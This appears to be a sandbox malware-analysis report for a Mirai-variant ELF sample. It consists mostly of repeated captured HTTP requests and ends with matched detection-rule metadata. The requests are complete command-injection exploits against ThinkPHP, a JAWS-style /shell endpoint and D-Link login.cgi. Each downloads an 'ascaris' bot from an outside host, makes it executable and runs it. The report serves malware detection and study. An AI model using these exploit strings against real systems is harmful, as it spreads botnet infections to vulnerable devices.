            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0

            System Summary

            barindex
            Source: fMB6uAXjd0.elf, type: SAMPLEMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
            Source: fMB6uAXjd0.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
            Source: 6235.1.00007ff2b0011000.00007ff2b0027000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
            Source: 6235.1.00007ff2b0011000.00007ff2b0027000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
            Source: fMB6uAXjd0.elf, type: SAMPLEMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
            Source: fMB6uAXjd0.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
            Source: 6235.1.00007ff2b0011000.00007ff2b0027000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
